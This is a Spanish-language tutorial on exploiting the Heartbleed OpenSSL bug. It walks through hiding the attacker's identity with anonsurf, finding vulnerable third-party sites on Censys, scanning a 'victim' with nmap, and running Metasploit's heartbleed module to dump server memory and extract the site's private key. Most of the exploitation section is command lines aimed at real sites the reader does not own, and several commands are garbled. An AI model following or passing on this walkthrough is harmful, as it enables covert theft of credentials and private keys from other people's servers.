Explotación de CVE-2014-0160 - Vulnerabilidades

Descripción:

CVE-2014-0160, o “Heartbleed”, no es un problema en SSL / TL específicamente, sino que fue un problema de implementación en OpenSSL que afecta a las versiones 1.0.1 a 1.0.1f. Puede solucionarse actualizando a una versión más reciente de OpenSSL o compilando alternativamente con la opción -DOPENSSL_NO_HEARTBEATS. No requiere un Man-in-the-Middle para explotar y puede ser explotado tanto contra el servidor como contra el cliente. El problema permite a un atacante extraer hasta 64 kb de memoria del sistema vulnerable, lo que puede conducir al robo de credenciales, tokens de sesión y claves privadas del servidor.

Explotaciòn:

Para esta explotaciòn vamos a utilizar una maquina con sistema operativo Kali Linux. Como primera medida vamos a iniciar el anunsurf para manejar el anonimato.

• Anonsurf start

Realizamos la búsqueda den Censys de un sitio vulnerable.

• https://censys.io/

Luego de detectar la dirección IP de una victima realizamos un escaneo con nmap vara validar si es vulnerable.

• nmap -p 443 –script = ssl-heartbleed para HEARTBLEED

• nmap -sV –version-light –script ssl-poodle -p 443 para POODLE

Utilizamos un modulo axuliar de metasploit, ingresamos la ip, puerto y seleccionamos modo DUMP para extraer información de la memoria del sitio., finalmente ejecutamos el exploit.

• msfconsole

• usar auxiliar / escáner / ssl / openssl_heartbleed msf auxiliar

• set RHOSTS

• set RPORT 443

• set VERBOSE true

• set action DUMP

• exploit

Observamos que nos trae 65 Kb de información de la memoria del sitio.

Cambiamos el modo de ataque para que nos extraiga claves que tenga y lo ejecutamos de nuevo.

• set action KEYS

Finalmente bbtenemos la clave privada del sitio.

Referencias:

• https://heartbleed.com/

• https://www.welivesecurity.com/la-es/2014/04/09/5-cosas-debes-saber-sobre-heartbleed/